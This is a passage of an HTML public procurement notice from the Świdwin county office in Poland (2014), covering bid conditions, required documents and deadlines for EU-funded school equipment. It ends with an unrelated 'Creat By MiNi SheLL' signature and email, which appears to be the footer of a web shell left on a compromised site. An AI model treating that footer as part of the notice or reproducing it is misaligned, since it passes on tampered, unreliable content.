Wykonana z polietylenu, do użytku wewnętrznego i zewnętrznego. Elementy stalowe malowane. wymiary po rozłożeniu max. 1820 × 250 × 435 mm, wymiary po złożeniu: min. 910 × 250 × 45 mm	6	szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 32.32.12.00-1, 16.33.00.00-7, 16.30.00.00-8, 39.15.10.00-5, 39.71.34.10-0, 39.31.30.00-9, 39.22.10.00-7, 39.31.40.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunku udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunku udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunku udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunku udziału w postępowaniu (załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Świdwinie, ul. Mieszka I 16, 78-300 Świdwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2014 godzina 09:00, miejsce: Sekretariat Starostwa Powiatowego w Świdwinie, ul. Mieszka I 16, 78-300 Świdwin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki
Priorytet IX:  Rozwój wykształcenia i kompetencji w regionach
Działanie: 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com